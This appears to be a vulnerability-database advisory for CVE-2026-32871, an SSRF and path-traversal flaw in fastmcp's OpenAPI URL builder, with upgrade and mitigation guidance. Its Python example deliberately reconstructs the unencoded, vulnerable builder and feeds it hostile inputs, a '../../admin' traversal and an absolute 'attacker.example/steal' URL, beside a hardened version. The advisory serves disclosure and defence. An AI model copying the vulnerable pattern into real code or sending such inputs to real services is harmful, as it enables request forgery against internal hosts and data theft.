PyPI: fastmcp
CVE-2026-32871
Safety vulnerability ID: SFTY-20260331-24057
Safety legacy ID: pyup.io-91326
Overview
FastMCP OpenAPI Provider has an SSRF & Path Traversal Vulnerability
Advisory
Affected versions of the fastmcp package are vulnerable to Server-Side Request Forgery (SSRF) and Path Traversal because of improper handling of path parameters during URL construction. In fastmcp/utilities/openapi/director.py, RequestDirector._build_url() substitutes untrusted (caller-supplied) path parameter values directly into path_template without percent-encoding them, then passes the result to urllib.parse.urljoin(). Because the values are not encoded, a value containing "/" or ".." is interpreted as path structure rather than as a single path segment; urljoin() then resolves the "../" sequences, so the final request path can escape the intended API prefix (path traversal). Where a parameter occupies the start of the template, the same lack of encoding lets a value that parses as an absolute URL or a network-path reference ("//host/...") replace the base URL entirely in urljoin(), redirecting the request to a host other than the configured API server (SSRF).
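The following example, written for this page and not taken from fastmcp's own _build_url() implementation, reconstructs the pattern the advisory describes (raw substitution, then urljoin()) and places a hardened builder beside it. The base URL, the path templates ("users/{user_id}/profile" and "{resource}") and the parameter values are constructed for the demonstration; the function names are this example's own.

```python
"""Illustrative reconstruction of the flaw pattern described above, with a
hardened builder beside it. Example code written for this page; it is not
fastmcp's own _build_url() implementation. The base URL, path template and
parameter values are constructed for the demonstration."""
from urllib.parse import quote, urljoin

# Constructed inputs. The trailing slash on the base matters: urljoin()
# only keeps "/v1/" as a prefix when the base path ends with "/".
BASE_URL = "https://api.example.com/v1/"
PATH_TEMPLATE = "users/{user_id}/profile"


def build_url_vulnerable(base_url: str, path_template: str, path_params: dict) -> str:
    """Raw substitution followed by urljoin(), the pattern the advisory describes.

    A value containing "/" or ".." is spliced in as path structure, and
    urljoin() resolves the dot segments, so the request can leave base_url.
    """
    path = path_template
    for name, value in path_params.items():
        path = path.replace("{" + name + "}", str(value))  # no encoding
    return urljoin(base_url, path)


def build_url_hardened(base_url: str, path_template: str, path_params: dict) -> str:
    """Encode each value as exactly one path segment, then re-check the prefix."""
    path = path_template
    for name, value in path_params.items():
        # safe="" percent-encodes "/" as well, so "../" becomes "..%2F" and
        # can no longer be resolved by urljoin() as a directory step.
        path = path.replace("{" + name + "}", quote(str(value), safe=""))
    url = urljoin(base_url, path)
    # Defence in depth: refuse any result that is not under the configured API base.
    if not url.startswith(base_url):
        raise ValueError(f"request URL escaped API prefix: {url}")
    return url


def demo() -> dict:
    """Run both builders over benign and hostile constructed inputs."""
    cases = {
        "benign": {"user_id": "42"},
        "traversal": {"user_id": "../../admin"},
    }
    out = {}
    for label, params in cases.items():
        out[label] = {
            "vulnerable": build_url_vulnerable(BASE_URL, PATH_TEMPLATE, params),
            "hardened": build_url_hardened(BASE_URL, PATH_TEMPLATE, params),
        }
    # When a parameter is the whole template (constructed template "{resource}"),
    # an unencoded absolute URL makes urljoin() drop the base entirely: the SSRF case.
    hostile = {"resource": "https://attacker.example/steal"}
    out["absolute_url"] = {
        "vulnerable": build_url_vulnerable(BASE_URL, "{resource}", hostile),
        "hardened": build_url_hardened(BASE_URL, "{resource}", hostile),
    }
    return out


if __name__ == "__main__":
    for label, urls in demo().items():
        print(f"{label:13s} vulnerable -> {urls['vulnerable']}")
        print(f"{'':13s} hardened   -> {urls['hardened']}")
```

Running the block shows the vulnerable builder turning "../../admin" into https://api.example.com/admin/profile (outside /v1/) and the "{resource}" template into a request to attacker.example, while the hardened builder keeps both under https://api.example.com/v1/ as opaque, percent-encoded segments. The startswith() guard is secondary: encoding is what prevents the escape, and the guard only catches mistakes in the template itself.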
How to Fix
Upgrade fastmcp to version 3.2.0 or later. The fix was merged in PrefectHQ/fastmcp pull request #3507 (commit 40bdfb6b1de0ce30609ee9ba5bb95ecd04a9fb71) and is covered by the v3.2.0 release tag listed in the references below.
Mitigation and Workarounds
Pending the upgrade, a stop-gap that follows from the root cause above (and is not part of the vendor advisory) is to reject or percent-encode path parameter values containing "/" or ".." before they reach the OpenAPI provider, and to verify that every outbound request URL still begins with the configured API base URL.
Vulnerable Functions
Functions linked to known vulnerabilities.
- fastmcp.utilities.openapi.director.RequestDirector._build_url (fastmcp/utilities/openapi/director.py)
References
- https://getsafety.com/vulnerabilities/SFTY-20260331-24057/CVE-2026-32871
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32871
- https://data.safetycli.com/changelogs/fastmcp/
- https://github.com/advisories/GHSA-vv7q-7jx5-f767
- https://pypi.org/project/fastmcp
- https://github.com/PrefectHQ/fastmcp/security/advisories/GHSA-vv7q-7jx5-f767
- https://nvd.nist.gov/vuln/detail/CVE-2026-32871
- https://github.com/PrefectHQ/fastmcp/pull/3507
- https://github.com/PrefectHQ/fastmcp/commit/40bdfb6b1de0ce30609ee9ba5bb95ecd04a9fb71
- https://github.com/PrefectHQ/fastmcp/releases/tag/v3.2.0
Verified by Safety
Our Cybersecurity Intelligence Team reviewed this vulnerability. We combine public data with our own research to find issues not yet reported to public sources.
